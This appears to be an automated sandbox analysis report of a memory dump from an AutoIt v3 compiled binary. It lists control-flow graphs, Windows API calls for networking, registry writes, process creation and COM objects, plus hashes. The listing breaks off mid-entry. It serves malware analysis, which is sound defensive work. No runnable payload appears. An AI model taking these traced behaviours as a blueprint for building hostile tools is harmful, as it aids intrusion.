                                                                                                                                                                  control_flow_graph 983 2278ee-227911 WSAStartup 984 2279b1-2279bd call 201943 983->984 985 227917-227938 gethostname gethostbyname 983->985 994 2279be-2279c1 984->994 985->984 986 22793a-227941 985->986 988 227943 986->988 989 22794e-227950 986->989 991 227945-22794c 988->991 992 227952-22795f call 201943 989->992 993 227961-2279a6 call 1ffaa0 inet_ntoa call 203220 call 228553 call 201943 call 20017e 989->993 991->989 991->991 999 2279a9-2279af WSACleanup 992->999 993->999 999->994
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                                                  • API String ID: 208665112-3771769585
                                                                                                                                                                  • Opcode ID: 3328f0f2503aee9f5781672c10d5722e164af92dd1b343b0e7d06e8cf2be6cee
                                                                                                                                                                  • Instruction ID: e2b54a07d957b365278940b5d9c9536e7c40fee30b83ce66a4dcc2b1c2ad6827
                                                                                                                                                                  • Opcode Fuzzy Hash: 3328f0f2503aee9f5781672c10d5722e164af92dd1b343b0e7d06e8cf2be6cee
                                                                                                                                                                  • Instruction Fuzzy Hash: C4110D31A18229BFDB25ABB0EC4AEDE777CEF05720F004065F44596091EFB0DBE18A51
                                                                                                                                                                  Function 0024352A Relevance: 16.2, APIs: 3, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1008 24352a-243569 call 1ed3d2 * 3 1015 243574-2435e7 call 1e84a6 call 243d7b call 243af7 1008->1015 1016 24356b-24356e 1008->1016 1030 243612-243617 1015->1030 1031 2435e9-2435f4 call 22d7e4 1015->1031 1016->1015 1017 2435f9-24360d call 1f2570 1016->1017 1023 243a94-243ab7 call 1e5cd3 * 3 1017->1023 1032 24366d 1030->1032 1033 243619-24362e RegConnectRegistryW 1030->1033 1031->1017 1039 243671-24369c RegCreateKeyExW 1032->1039 1036 243667-24366b 1033->1036 1037 243630-243662 call 1e7ba9 call 22d7e4 call 1f2570 1033->1037 1036->1039 1037->1023 1042 2436e7-2436ec 1039->1042 1043 24369e-2436d2 call 1e7ba9 call 22d7e4 call 1f2570 1039->1043 1045 2436f2-243715 call 1e84a6 call 201bc7 1042->1045 1046 243a7b-243a8c 1042->1046 1043->1023 1065 2436d8-2436e2 1043->1065 1063 243796-2437b6 call 1e84a6 call 201bc7 1045->1063 1064 243717-24376d call 1e84a6 call 2018fb call 1e84a6 * 2 1045->1064 1046->1023 1058 243a8e 1046->1058 1058->1023 1075 243840-243860 call 1e84a6 call 201bc7 1063->1075 1076 2437bc-243814 call 1e84a6 call 2018fb call 1e84a6 * 2 RegSetValueExW 1063->1076 1064->1046 1096 243773-243791 call 1e7ba9 call 1f2570 1064->1096 1065->1023 1089 243866-2438c9 call 1e84a6 call 20010a call 1e84a6 call 1e3b1e 1075->1089 1090 243949-243969 call 1e84a6 call 201bc7 1075->1090 1076->1046 1107 24381a-24383b call 1e7ba9 call 1f2570 1076->1107 1129 2438e9-243918 call 1e84a6 1089->1129 1130 2438cb-2438d0 1089->1130 1109 2439c6-2439e6 call 1e84a6 call 201bc7 1090->1109 1110 24396b-24398b call 1ecdb4 call 1e84a6 1090->1110 1118 243a74 1096->1118 1107->1046 1132 243a13-243a30 call 1e84a6 call 201bc7 1109->1132 1133 2439e8-243a0e call 1ed00b call 1e84a6 1109->1133 1134 24398d-2439a1 1110->1134 1118->1046 1149 24393d-243944 call 20017e 1129->1149 1150 24391a-243936 call 1e7ba9 call 1f2570 1129->1150 1135 2438d2-2438d4 1130->1135 1136 2438d8-2438db 1130->1136 1154 243a67-243a71 call 1f2570 1132->1154 1155 243a32-243a60 call 22be47 call 1e84a6 call 22be8a 1132->1155 1133->1134 1134->1046 1147 2439a7-2439c1 call 1e7ba9 call 1f2570 1134->1147 1135->1136 1136->1130 1137 2438dd-2438df 1136->1137 1137->1129 1141 2438e1-2438e5 1137->1141 1141->1129 1147->1118 1149->1046 1150->1149 1154->1118 1155->1154
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00243626
                                                                                                                                                                  • RegCreateKeyExW.KERNEL32(?,?,00000000,0027DBF0,00000000,?,00000000,?,?), ref: 00243694
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConnectCreateRegistry
                                                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                  • API String ID: 4192528855-966354055
                                                                                                                                                                  • Opcode ID: 81b48be5976d28e368fafd78079178472982dbb740fede52c36d5395953b5f4b
                                                                                                                                                                  • Instruction ID: a38f94b3f30f8365a52e27495b187db72f0309276e1594acbf6694ee8d017108
                                                                                                                                                                  • Opcode Fuzzy Hash: 81b48be5976d28e368fafd78079178472982dbb740fede52c36d5395953b5f4b
                                                                                                                                                                  • Instruction Fuzzy Hash: DF024A75610A129FCB14EF25C895E2AB7E5FF89720F05845DF88A9B3A2DB30ED11CB41
                                                                                                                                                                  Function 001E30A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 001E30B0
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 001E30BF
                                                                                                                                                                  • LoadIconW.USER32(00000063), ref: 001E30D5
                                                                                                                                                                  • LoadIconW.USER32(000000A4), ref: 001E30E7
                                                                                                                                                                  • LoadIconW.USER32(000000A2), ref: 001E30F9
                                                                                                                                                                    • Part of subcall function 001E318A: LoadImageW.USER32(001E0000,00000063,00000001,00000010,00000010,00000000), ref: 001E31AE
                                                                                                                                                                  • RegisterClassExW.USER32(?), ref: 001E3167
                                                                                                                                                                    • Part of subcall function 001E2F58: GetSysColorBrush.USER32(0000000F), ref: 001E2F8B
                                                                                                                                                                    • Part of subcall function 001E2F58: RegisterClassExW.USER32(00000030), ref: 001E2FB5
                                                                                                                                                                    • Part of subcall function 001E2F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 001E2FC6
                                                                                                                                                                    • Part of subcall function 001E2F58: LoadIconW.USER32(000000A9), ref: 001E3009
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                                                                  • API String ID: 2880975755-4155596026
                                                                                                                                                                  • Opcode ID: 0db013c7f947fcec5998e998f752187bf06e6c310284f3e0b3d986b14d7614a5
                                                                                                                                                                  • Instruction ID: 002ce8d2a819c7a4d10937b5074a39d06fd7d552c52491abc65e1dd551a205a2
                                                                                                                                                                  • Opcode Fuzzy Hash: 0db013c7f947fcec5998e998f752187bf06e6c310284f3e0b3d986b14d7614a5
                                                                                                                                                                  • Instruction Fuzzy Hash: 072133B4E04358ABCB01DFA9FC4DA9DBBF5FB49320F00812AE618A32A0DB7545548F95
                                                                                                                                                                  Function 0023B74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1237 23b74b-23b7ac VariantInit call 1eca8e CoInitialize 1240 23b7b4-23b7c7 call 1fd5f6 1237->1240 1241 23b7ae CoUninitialize 1237->1241 1244 23b7d5-23b7dc 1240->1244 1245 23b7c9-23b7d0 call 1eca8e 1240->1245 1241->1240 1247 23b81b-23b85b call 1e84a6 call 1ff885 1244->1247 1248 23b7de-23b805 call 1e84a6 call 21a857 1244->1248 1245->1244 1257 23b9d3-23ba17 SetErrorMode CoGetInstanceFromFile 1247->1257 1258 23b861-23b86e 1247->1258 1248->1247 1259 23b807-23b816 call 23c235 1248->1259 1262 23ba19-23ba1d 1257->1262 1263 23ba1f-23ba3a CoGetObject 1257->1263 1260 23b870-23b881 call 1fd5f6 1258->1260 1261 23b8a8-23b8b6 GetRunningObjectTable 1258->1261 1272 23bad0-23bae3 VariantClear 1259->1272 1279 23b883-23b88d call 1ecdb4 1260->1279 1280 23b8a0 1260->1280 1265 23b8d5-23b8e8 call 23c235 1261->1265 1266 23b8b8-23b8c9 1261->1266 1268 23ba40-23ba47 SetErrorMode 1262->1268 1269 23bab5-23bac5 call 23c235 SetErrorMode 1263->1269 1270 23ba3c 1263->1270 1288 23bac7-23bacb call 1e5cd3 1265->1288 1286 23b8cb-23b8d0 1266->1286 1287 23b8ed-23b8fc 1266->1287 1276 23ba4b-23ba51 1268->1276 1269->1288 1270->1268 1282 23ba53-23ba55 1276->1282 1283 23baa8-23baab 1276->1283 1279->1280 1297 23b88f-23b89e call 1ecdb4 1279->1297 1280->1261 1284 23ba57-23ba78 call 21ac4b 1282->1284 1285 23ba8d-23baa6 call 22a6f6 1282->1285 1283->1269 1284->1285 1298 23ba7a-23ba83 1284->1298 1285->1288 1286->1265 1296 23b907-23b91b 1287->1296 1288->1272 1303 23b921-23b925 1296->1303 1304 23b9bb-23b9d1 1296->1304 1297->1261 1298->1285 1303->1304 1305 23b92b-23b940 1303->1305 1304->1276 1308 23b9a2-23b9ac 1305->1308 1309 23b942-23b957 1305->1309 1308->1296 1309->1308 1313 23b959-23b983 call 21ac4b 1309->1313 1317 23b985-23b98d 1313->1317 1318 23b994-23b99e 1313->1318 1319 23b9b1-23b9b6 1317->1319 1320 23b98f-23b990 1317->1320 1318->1308 1319->1304 1320->1318
                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0023B777
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0023B7A4
                                                                                                                                                                  • CoUninitialize.COMBASE ref: 0023B7AE
                                                                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 0023B8AE
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 0023B9DB
                                                                                                                                                                  • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0023BA0F
                                                                                                                                                                  • CoGetObject.OLE32(?,00000000,0026D91C,?), ref: 0023BA32
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 0023BA45
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0023BAC5
                                                                                                                                                                  • VariantClear.OLEAUT32(0026D91C), ref: 0023BAD5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2395222682-0
                                                                                                                                                                  • Opcode ID: 875c452f1e3ab9ee811a934d7621e788951e70ca69e0bba54ad575fffab30ae8
                                                                                                                                                                  • Instruction ID: 5b858d018bcb74d95a9a372ab20d4206a517276e9a6477c6e2b2982b842bc979
                                                                                                                                                                  • Opcode Fuzzy Hash: 875c452f1e3ab9ee811a934d7621e788951e70ca69e0bba54ad575fffab30ae8
                                                                                                                                                                  • Instruction Fuzzy Hash: 6EC115B16143059FC701DF68C884A6BB7E9FF89308F00495DFA8A9B251DB71ED16CB92
                                                                                                                                                                  Function 001E2F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 001E2F8B
                                                                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 001E2FB5
                                                                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 001E2FC6
                                                                                                                                                                  • LoadIconW.USER32(000000A9), ref: 001E3009
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                  • API String ID: 975902462-1005189915
                                                                                                                                                                  • Opcode ID: abd0246c6cf172bf176f1e40dd7265e9b01a0f999d14c8f4096d5d54d4df34bb
                                                                                                                                                                  • Instruction ID: 9bd3a24bcaf6c0666b7246d5abb4a1617125fc11d33a28c5162477031123d559
                                                                                                                                                                  • Opcode Fuzzy Hash: abd0246c6cf172bf176f1e40dd7265e9b01a0f999d14c8f4096d5d54d4df34bb
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D21BFB5E00318AFEB009FA5E88DBCEBBB4FB09710F00811AF615A62A0DBB54554CF91
                                                                                                                                                                  Function 002423C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1326 2423c5-242426 call 201970 1329 242452-242456 1326->1329 1330 242428-24243b call 1ecdb4 1326->1330 1332 24249d-2424a3 1329->1332 1333 242458-242468 call 1ecdb4 1329->1333 1338 24243d-242450 call 1ecdb4 1330->1338 1339 242488 1330->1339 1335 2424a5-2424a8 1332->1335 1336 2424b8-2424be 1332->1336 1348 24246b-242484 call 1ecdb4 1333->1348 1340 2424ab-2424b0 call 1ecdb4 1335->1340 1341 2424c0 1336->1341 1342 2424c8-2424e2 call 1e84a6 call 1e3bcf 1336->1342 1338->1348 1344 24248b-24248f 1339->1344 1340->1336 1341->1342 1359 2425a1-2425a9 1342->1359 1360 2424e8-242541 call 1e84a6 call 1e3bcf call 1e84a6 call 1e3bcf call 1e84a6 call 1e3bcf 1342->1360 1349 242491-242497 1344->1349 1350 242499-24249b 1344->1350 1348->1332 1358 242486 1348->1358 1349->1340 1350->1332 1350->1336 1358->1344 1362 2425d3-242601 GetCurrentDirectoryW call 20010a GetCurrentDirectoryW 1359->1362 1363 2425ab-2425c6 call 1e84a6 call 1e3bcf 1359->1363 1408 242543-24255e call 1e84a6 call 1e3bcf 1360->1408 1409 24256f-24259f GetSystemDirectoryW call 20010a GetSystemDirectoryW 1360->1409 1371 242605 1362->1371 1363->1362 1379 2425c8-2425d1 call 2018fb 1363->1379 1374 242609-24260d 1371->1374 1377 24263e-24264e call 229a8f 1374->1377 1378 24260f-242639 call 1eca8e * 3 1374->1378 1390 242650-24269b call 22a17a call 22a073 call 22a102 1377->1390 1391 2426aa 1377->1391 1378->1377 1379->1362 1379->1377 1393 2426ac-2426bb 1390->1393 1422 24269d-2426a8 1390->1422 1391->1393 1397 2426c1-2426f1 call 21bc90 call 2018fb 1393->1397 1398 24274c-242768 CreateProcessW 1393->1398 1423 2426f3-2426f8 1397->1423 1424 2426fa-24270a call 2018fb 1397->1424 1404 24276b-24277e call 20017e * 2 1398->1404 1427 242780-2427b8 call 22d7e4 GetLastError call 1e7ba9 call 1f2570 1404->1427 1428 2427bd-2427c9 CloseHandle 1404->1428 1408->1409 1430 242560-242569 call 2018fb 1408->1430 1409->1371 1422->1393 1423->1423 1423->1424 1434 242713-242723 call 2018fb 1424->1434 1435 24270c-242711 1424->1435 1443 24283e-24284f call 229b29 1427->1443 1432 2427f5-2427f9 1428->1432 1433 2427cb-2427f0 call 229d09 call 22a37f call 242881 1428->1433 1430->1374 1430->1409 1437 242807-242811 1432->1437 1438 2427fb-242805 1432->1438 1433->1432 1454 242725-24272a 1434->1454 1455 24272c-24274a call 20017e * 3 1434->1455 1435->1434 1435->1435 1444 242813 1437->1444 1445 242819-242838 call 1f2570 CloseHandle 1437->1445 1438->1443 1444->1445 1445->1443 1454->1454 1454->1455 1455->1404
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 002423E6
                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00242579
                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0024259D
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002425DD
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002425FF
                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00242760
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00242792
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 002427C1
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00242838
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4090791747-0
                                                                                                                                                                  • Opcode ID: 2490bc5997333b1935f5a33e029582c985d94ee223b18c33dd4a5d38389ad4c8
                                                                                                                                                                  • Instruction ID: 987bcb0e4d70bd42c444cb5267486a3a503624bb426ba603481052f633d1ef12
                                                                                                                                                                  • Opcode Fuzzy Hash: 2490bc5997333b1935f5a33e029582c985d94ee223b18c33dd4a5d38389ad4c8
                                                                                                                                                                  • Instruction Fuzzy Hash: 1FD1BB31614341DFC718EF26C891B6EBBE1AF85310F14845DF8899B2A2DB70EC55CB52
                                                                                                                                                                  Function 0023C8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1467 23c8b7-23c8f1 1468 23c8f7-23c8fa 1467->1468 1469 23ccfb-23ccff 1467->1469 1468->1469 1471 23c900-23c903 1468->1471 1470 23cd04-23cd05 1469->1470 1472 23cd06 call 23c235 1470->1472 1471->1469 1473 23c909-23c912 call 23cff8 1471->1473 1476 23cd0b-23cd0f 1472->1476 1478 23c925-23c92e call 22be14 1473->1478 1479 23c914-23c920 1473->1479 1482 23cc61-23cc6c call 1ed2c0 1478->1482 1483 23c934-23c93a 1478->1483 1479->1472 1491 23cca9-23ccb4 call 1ed2c0 1482->1491 1492 23cc6e-23cc72 1482->1492 1484 23c940 1483->1484 1485 23c93c-23c93e 1483->1485 1487 23c942-23c94a 1484->1487 1485->1487 1489 23c950-23c967 call 21abf3 1487->1489 1490 23ccec-23ccf4 1487->1490 1501 23c973-23c97f 1489->1501 1502 23c969-23c96e 1489->1502 1490->1469 1491->1490 1500 23ccb6-23ccba 1491->1500 1495 23cc74-23cc76 1492->1495 1496 23cc78 1492->1496 1499 23cc7a-23cc98 call 1fd6b4 call 2297b6 1495->1499 1496->1499 1517 23cc99-23cca7 call 22d7e4 1499->1517 1504 23ccc0 1500->1504 1505 23ccbc-23ccbe 1500->1505 1506 23c981-23c98d 1501->1506 1507 23c9ce-23c9f9 call 1ffa89 1501->1507 1502->1470 1510 23ccc2-23ccea call 1fd6b4 call 22503c call 1f2570 1504->1510 1505->1510 1506->1507 1511 23c98f-23c99c call 21a8c8 1506->1511 1518 23c9fb-23ca16 call 1fac65 1507->1518 1519 23ca18-23ca1a 1507->1519 1510->1517 1521 23c9a1-23c9a6 1511->1521 1517->1476 1524 23ca1d-23ca24 1518->1524 1519->1524 1521->1507 1526 23c9a8-23c9af 1521->1526 1531 23ca52-23ca59 1524->1531 1532 23ca26-23ca30 1524->1532 1527 23c9b1-23c9b8 1526->1527 1528 23c9be-23c9c5 1526->1528 1527->1528 1534 23c9ba 1527->1534 1528->1507 1537 23c9c7 1528->1537 1535 23cadf-23caec 1531->1535 1536 23ca5f-23ca66 1531->1536 1538 23ca32-23ca48 call 21a25b 1532->1538 1534->1528 1541 23cafb-23cb28 VariantInit call 201970 1535->1541 1542 23caee-23caf8 1535->1542 1536->1535 1540 23ca68-23ca7b 1536->1540 1537->1507 1548 23ca4a-23ca50 1538->1548 1545 23ca7c-23ca84 1540->1545 1552 23cb2a-23cb2b 1541->1552 1553 23cb2d-23cb30 1541->1553 1542->1541 1549 23cad1-23cada 1545->1549 1550 23ca86-23caa3 VariantClear 1545->1550 1548->1531 1549->1545 1556 23cadc 1549->1556 1554 23caa5-23cab9 SysAllocString 1550->1554 1555 23cabc-23cacc 1550->1555 1557 23cb31-23cb43 1552->1557 1553->1557 1554->1555 1555->1549 1558 23cace 1555->1558 1556->1535 1559 23cb47-23cb4c 1557->1559 1558->1549 1560 23cb8a-23cb8c 1559->1560 1561 23cb4e-23cb52 1559->1561 1564 23cbb4-23cbd5 call 22d7e4 call 22a6f6 1560->1564 1565 23cb8e-23cb95 1560->1565 1562 23cba1-23cba5 1561->1562 1563 23cb54-23cb86 1561->1563 1568 23cba6-23cbaf call 23c235 1562->1568 1563->1560 1574 23cc41-23cc50 VariantClear 1564->1574 1577 23cbd7-23cbe0 1564->1577 1565->1562 1567 23cb97-23cb9f 1565->1567 1567->1568 1568->1574 1575 23cc52-23cc55 call 221693 1574->1575 1576 23cc5a-23cc5c 1574->1576 1575->1576 1576->1476 1579 23cbe2-23cbef 1577->1579 1580 23cbf1-23cbf8 1579->1580 1581 23cc38-23cc3f 1579->1581 1582 23cc26-23cc2a 1580->1582 1583 23cbfa-23cc0a 1580->1583 1581->1574 1581->1579 1585 23cc30 1582->1585 1586 23cc2c-23cc2e 1582->1586 1583->1581 1584 23cc0c-23cc14 1583->1584 1584->1582 1587 23cc16-23cc1c 1584->1587 1588 23cc32-23cc33 call 22a6f6 1585->1588 1586->1588 1587->1582 1589 23cc1e-23cc24 1587->1589 1588->1581 1589->1581 1589->1582
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
